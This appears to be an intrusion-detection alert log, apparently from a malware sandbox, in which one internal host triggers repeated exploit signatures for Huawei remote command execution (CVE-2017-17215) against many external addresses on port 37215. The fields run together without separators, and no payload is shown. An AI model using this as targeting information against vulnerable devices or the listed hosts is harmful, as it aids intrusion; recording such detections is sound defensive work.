                                                        06/13/24-21:32:03.297189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811237215192.168.2.1441.79.41.75
                                                        06/13/24-21:32:13.544806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575237215192.168.2.14197.52.135.96
                                                        06/13/24-21:32:13.570394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885637215192.168.2.14156.98.214.185
                                                        06/13/24-21:32:42.409281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794237215192.168.2.14156.103.138.90
                                                        06/13/24-21:33:09.102374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352437215192.168.2.14156.240.0.17
                                                        06/13/24-21:32:25.976833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334437215192.168.2.14156.132.246.8
                                                        06/13/24-21:33:02.954106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150237215192.168.2.1441.221.112.139
                                                        06/13/24-21:32:23.835829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582437215192.168.2.1441.36.26.229
                                                        06/13/24-21:32:36.268333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011837215192.168.2.14156.237.43.142
                                                        06/13/24-21:32:42.424446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094837215192.168.2.1441.154.141.211
                                                        06/13/24-21:32:32.169501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291037215192.168.2.14156.144.17.180
                                                        06/13/24-21:33:09.089389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625437215192.168.2.1441.150.187.77
                                                        06/13/24-21:32:36.264042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649237215192.168.2.1441.238.146.249
                                                        06/13/24-21:32:40.378154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005837215192.168.2.14156.209.22.97
                                                        06/13/24-21:33:13.212040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990237215192.168.2.1441.51.137.88
                                                        06/13/24-21:31:59.173795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223037215192.168.2.14197.208.79.238
                                                        06/13/24-21:32:13.543849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975837215192.168.2.14197.202.79.152
                                                        06/13/24-21:33:13.211475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609237215192.168.2.14156.12.75.11
                                                        06/13/24-21:32:44.451450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585837215192.168.2.14197.6.224.46
                                                        06/13/24-21:32:07.416633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010637215192.168.2.14197.185.171.21
                                                        06/13/24-21:31:57.153010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5807237215192.168.2.14197.247.104.150
                                                        06/13/24-21:32:23.934836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697037215192.168.2.1441.67.163.161
                                                        06/13/24-21:32:11.507315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497037215192.168.2.14156.80.115.40
                                                        06/13/24-21:33:11.159380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795637215192.168.2.14156.156.33.119
                                                        06/13/24-21:32:34.199561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013837215192.168.2.1441.68.81.200
                                                        06/13/24-21:33:00.888421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381237215192.168.2.14156.124.169.173
                                                        06/13/24-21:32:09.436801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415037215192.168.2.1441.135.203.170
                                                        06/13/24-21:32:23.942865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254237215192.168.2.14156.57.158.120
                                                        06/13/24-21:32:32.156383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049237215192.168.2.14156.155.189.206
                                                        06/13/24-21:33:07.042737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3604637215192.168.2.14197.138.247.118
                                                        06/13/24-21:33:11.160293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019037215192.168.2.14156.201.114.188
                                                        06/13/24-21:32:17.672910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371437215192.168.2.14156.142.113.239
                                                        06/13/24-21:33:11.181656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005037215192.168.2.14156.115.199.216
                                                        06/13/24-21:32:48.570326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872637215192.168.2.14197.150.111.205
                                                        06/13/24-21:32:48.554254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904637215192.168.2.14197.167.237.174
                                                        06/13/24-21:32:58.824012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191437215192.168.2.14156.233.68.20
                                                        06/13/24-21:32:07.402575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513037215192.168.2.1441.63.55.8
                                                        06/13/24-21:32:15.608950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569437215192.168.2.14197.248.142.77
                                                        06/13/24-21:32:03.309362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501437215192.168.2.14156.228.243.239
                                                        06/13/24-21:32:01.223392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352037215192.168.2.14197.142.2.12
                                                        06/13/24-21:32:50.617424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056637215192.168.2.14197.163.205.69
                                                        06/13/24-21:31:59.196774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865237215192.168.2.14156.51.238.240
                                                        06/13/24-21:32:32.165202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964637215192.168.2.1441.36.117.34
                                                        06/13/24-21:32:25.973446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259837215192.168.2.1441.131.212.135
                                                        06/13/24-21:31:57.136158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716037215192.168.2.14197.224.67.201
                                                        06/13/24-21:32:50.613100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364237215192.168.2.14197.93.155.235
                                                        06/13/24-21:33:11.159784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359637215192.168.2.1441.120.132.168
                                                        06/13/24-21:33:02.936541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.14197.142.147.135
                                                        06/13/24-21:32:40.355389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381437215192.168.2.14156.149.89.142
                                                        06/13/24-21:32:44.452466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769037215192.168.2.1441.3.73.44
                                                        06/13/24-21:32:21.783524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614837215192.168.2.14197.133.230.177
                                                        06/13/24-21:32:54.711923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412437215192.168.2.14156.159.233.39
                                                        06/13/24-21:32:13.545282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463037215192.168.2.1441.222.39.211
                                                        06/13/24-21:32:58.822050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472637215192.168.2.14156.126.162.35
                                                        06/13/24-21:32:34.199301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118037215192.168.2.1441.249.4.117
                                                        06/13/24-21:32:40.374931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375237215192.168.2.14156.69.150.234
                                                        06/13/24-21:32:50.614485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360837215192.168.2.1441.129.248.19
                                                        06/13/24-21:32:13.566186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952037215192.168.2.14197.131.203.255
                                                        06/13/24-21:33:09.102145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.1441.7.155.58
                                                        06/13/24-21:32:23.831082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485637215192.168.2.14156.53.36.231
                                                        06/13/24-21:32:19.731393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654237215192.168.2.1441.60.231.198
                                                        06/13/24-21:33:17.309310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377437215192.168.2.14156.196.199.192
                                                        06/13/24-21:32:28.027262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137037215192.168.2.14197.126.154.248
                                                        06/13/24-21:32:40.374982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480637215192.168.2.1441.183.137.147
                                                        06/13/24-21:31:59.195366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.14197.6.83.65
                                                        06/13/24-21:33:09.131094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4006437215192.168.2.14156.50.17.35
                                                        06/13/24-21:33:15.273504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314637215192.168.2.14156.240.10.247
                                                        06/13/24-21:32:32.155826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778037215192.168.2.14197.233.154.172
                                                        06/13/24-21:32:36.266959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990237215192.168.2.14156.170.49.93
                                                        06/13/24-21:32:23.941698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820637215192.168.2.14197.14.95.116
                                                        06/13/24-21:33:02.914086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552037215192.168.2.14197.128.203.190
                                                        06/13/24-21:32:54.707013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238837215192.168.2.1441.214.67.28
                                                        06/13/24-21:32:34.196389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660837215192.168.2.1441.235.20.220
                                                        06/13/24-21:33:09.109919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732837215192.168.2.14156.203.247.164
                                                        06/13/24-21:33:15.255835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255237215192.168.2.1441.118.137.48
                                                        06/13/24-21:31:57.132584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018237215192.168.2.1441.138.162.225
                                                        06/13/24-21:32:52.679755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836237215192.168.2.1441.57.119.62
                                                        06/13/24-21:32:28.027140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915037215192.168.2.1441.233.137.162
                                                        06/13/24-21:32:30.095346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994237215192.168.2.1441.100.113.147
                                                        06/13/24-21:32:17.695102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778037215192.168.2.14156.241.145.185
                                                        06/13/24-21:32:48.554281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123637215192.168.2.14156.30.42.222
                                                        06/13/24-21:31:57.131082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446837215192.168.2.14197.46.38.93
                                                        06/13/24-21:32:54.725511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643037215192.168.2.14156.64.45.206
                                                        06/13/24-21:33:11.159744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310037215192.168.2.14197.57.84.102
                                                        06/13/24-21:32:50.630660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087837215192.168.2.14156.34.93.148
                                                        06/13/24-21:32:21.784052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939837215192.168.2.1441.60.68.20
                                                        06/13/24-21:32:54.706883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247437215192.168.2.14156.107.64.159
                                                        06/13/24-21:31:57.131802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983037215192.168.2.1441.101.112.239
                                                        06/13/24-21:32:40.358696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409437215192.168.2.14156.204.177.88
                                                        06/13/24-21:32:28.025384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386437215192.168.2.14197.88.117.205
                                                        06/13/24-21:32:34.218091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499837215192.168.2.14197.202.30.7
                                                        06/13/24-21:32:01.224765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629437215192.168.2.14156.42.38.198
                                                        06/13/24-21:32:25.993736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714637215192.168.2.14197.39.241.77
                                                        06/13/24-21:32:21.779836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974037215192.168.2.14156.152.102.216
                                                        06/13/24-21:32:21.805919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643237215192.168.2.14156.121.67.243
                                                        06/13/24-21:32:48.553601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527637215192.168.2.14156.198.236.204
                                                        06/13/24-21:33:02.937248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957037215192.168.2.14156.234.236.218
                                                        06/13/24-21:33:00.870148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874037215192.168.2.14156.203.144.199
                                                        06/13/24-21:32:46.501959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060037215192.168.2.1441.254.224.60
                                                        06/13/24-21:32:48.554155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508237215192.168.2.1441.80.27.112
                                                        06/13/24-21:33:17.306060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127037215192.168.2.1441.5.135.169
                                                        06/13/24-21:32:32.153420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687037215192.168.2.14156.60.204.83
                                                        06/13/24-21:33:15.275169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314637215192.168.2.1441.231.115.159
                                                        06/13/24-21:32:36.245347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795637215192.168.2.14156.254.6.241
                                                        06/13/24-21:32:03.279362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404837215192.168.2.1441.222.186.62
                                                        06/13/24-21:32:07.418191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354837215192.168.2.14197.251.242.46
                                                        06/13/24-21:33:13.231265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428837215192.168.2.14197.90.229.23
                                                        06/13/24-21:32:01.241207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215837215192.168.2.14197.29.202.116
                                                        06/13/24-21:32:46.503104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711037215192.168.2.14197.50.165.228
                                                        06/13/24-21:32:09.458938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493637215192.168.2.1441.83.112.53
                                                        06/13/24-21:33:09.088615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501637215192.168.2.1441.5.185.107
                                                        06/13/24-21:32:50.629201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826437215192.168.2.14197.107.153.13
                                                        06/13/24-21:33:17.307343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123837215192.168.2.14156.40.210.248
                                                        06/13/24-21:33:04.992694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773237215192.168.2.14197.186.1.210
                                                        06/13/24-21:32:52.671063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273637215192.168.2.1441.28.168.32
                                                        06/13/24-21:33:11.157495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489037215192.168.2.14197.216.144.121
                                                        06/13/24-21:33:13.231520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092437215192.168.2.14156.129.219.143
                                                        06/13/24-21:32:03.305756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344637215192.168.2.1441.19.25.177
                                                        06/13/24-21:33:09.109706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313637215192.168.2.14197.56.7.250
                                                        06/13/24-21:33:15.252081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374837215192.168.2.14197.14.227.185
                                                        06/13/24-21:31:57.137506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005037215192.168.2.1441.154.194.136
                                                        06/13/24-21:32:56.790638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694637215192.168.2.14156.156.118.195
                                                        06/13/24-21:31:59.197613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827837215192.168.2.1441.187.7.24
                                                        06/13/24-21:32:09.455756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322837215192.168.2.1441.6.226.111
                                                        06/13/24-21:32:56.759091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884437215192.168.2.1441.34.129.121
                                                        06/13/24-21:32:13.567686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575237215192.168.2.14197.155.249.92
                                                        06/13/24-21:32:25.973238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090837215192.168.2.1441.49.159.234
                                                        06/13/24-21:32:05.376655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018637215192.168.2.14156.150.212.127
                                                        06/13/24-21:32:32.153814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913837215192.168.2.14197.247.132.210
                                                        06/13/24-21:33:15.256821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183837215192.168.2.1441.107.177.139
                                                        06/13/24-21:32:23.935166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487637215192.168.2.14156.248.67.23
                                                        06/13/24-21:32:25.991574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902637215192.168.2.14197.163.159.36
                                                        06/13/24-21:32:50.614447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029637215192.168.2.14156.96.103.190
                                                        06/13/24-21:32:38.320871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854237215192.168.2.1441.22.58.183
                                                        06/13/24-21:32:56.753302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007837215192.168.2.14197.193.32.39
                                                        06/13/24-21:32:44.456690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371837215192.168.2.1441.59.147.97
                                                        06/13/24-21:33:00.869044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520237215192.168.2.14197.199.7.161
                                                        06/13/24-21:32:21.803067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377037215192.168.2.1441.237.83.191
                                                        06/13/24-21:32:42.407444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221637215192.168.2.1441.204.123.133
                                                        06/13/24-21:32:50.611495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956037215192.168.2.1441.218.71.151
                                                        06/13/24-21:32:32.154751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362837215192.168.2.1441.14.245.186
                                                        06/13/24-21:32:52.677524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452237215192.168.2.1441.80.198.80
                                                        06/13/24-21:32:52.670336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956237215192.168.2.1441.115.70.43
                                                        06/13/24-21:32:25.978659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849837215192.168.2.14156.192.84.145
                                                        06/13/24-21:32:13.566046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648837215192.168.2.1441.7.153.221
                                                        06/13/24-21:32:54.706989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146637215192.168.2.14156.206.30.137
                                                        06/13/24-21:32:28.028431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115037215192.168.2.14197.96.62.76
                                                        06/13/24-21:32:46.524040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5484237215192.168.2.1441.191.48.5
                                                        06/13/24-21:32:58.823079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3368437215192.168.2.14197.115.115.176
                                                        06/13/24-21:32:23.942126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091237215192.168.2.14197.206.166.240
                                                        06/13/24-21:33:17.306814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388637215192.168.2.14156.148.232.54
                                                        06/13/24-21:32:09.437168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723437215192.168.2.14156.91.3.203
                                                        06/13/24-21:32:30.099600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347837215192.168.2.14156.183.92.138
                                                        06/13/24-21:32:42.420508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.1441.115.174.207
                                                        06/13/24-21:32:05.346031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025437215192.168.2.1441.46.126.32
                                                        06/13/24-21:32:52.660707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680437215192.168.2.14197.41.177.193
                                                        06/13/24-21:32:38.299047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353437215192.168.2.14156.85.217.39
                                                        06/13/24-21:32:13.546507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314037215192.168.2.1441.172.134.106
                                                        06/13/24-21:32:42.424003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974037215192.168.2.14197.93.178.159
                                                        06/13/24-21:33:15.256388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505237215192.168.2.1441.220.10.16
                                                        06/13/24-21:31:57.137066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866837215192.168.2.1441.158.26.48
                                                        06/13/24-21:32:48.553810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682437215192.168.2.1441.35.104.146
                                                        06/13/24-21:33:07.037641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4007237215192.168.2.1441.200.103.245
                                                        06/13/24-21:32:25.993163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225837215192.168.2.1441.227.133.98
                                                        06/13/24-21:32:44.453787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641637215192.168.2.14156.149.27.182
                                                        06/13/24-21:32:32.154715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5902237215192.168.2.14197.181.25.160
                                                        06/13/24-21:33:09.129082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486837215192.168.2.14197.241.203.46
                                                        06/13/24-21:32:05.345473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903037215192.168.2.14197.11.214.254
                                                        06/13/24-21:31:59.174290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644637215192.168.2.1441.53.218.229
                                                        06/13/24-21:32:38.316434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429437215192.168.2.14156.84.161.15
                                                        06/13/24-21:32:03.294984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209437215192.168.2.14156.233.152.133
                                                        06/13/24-21:32:23.941128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688037215192.168.2.14156.158.188.189
                                                        06/13/24-21:32:28.045061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587437215192.168.2.14197.24.233.69
                                                        06/13/24-21:32:21.781483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031237215192.168.2.1441.115.211.190
                                                        06/13/24-21:32:36.264892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844637215192.168.2.14197.173.83.234
                                                        06/13/24-21:32:05.350659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517237215192.168.2.14156.169.101.97
                                                        06/13/24-21:32:30.124799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740237215192.168.2.14156.218.182.119
                                                        06/13/24-21:32:28.045280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573837215192.168.2.1441.187.221.211
                                                        06/13/24-21:33:09.087972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658037215192.168.2.14197.154.250.207
                                                        06/13/24-21:32:32.154872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917837215192.168.2.14197.97.66.160
                                                        06/13/24-21:32:05.349756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054437215192.168.2.14197.215.243.44
                                                        06/13/24-21:32:32.156651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775837215192.168.2.14156.108.30.200
                                                        06/13/24-21:32:42.406939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870037215192.168.2.14197.231.142.25
                                                        06/13/24-21:32:07.416784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542637215192.168.2.1441.29.149.162
                                                        06/13/24-21:33:02.913172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329237215192.168.2.14197.16.36.24
                                                        06/13/24-21:32:23.930929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354837215192.168.2.14156.5.51.49
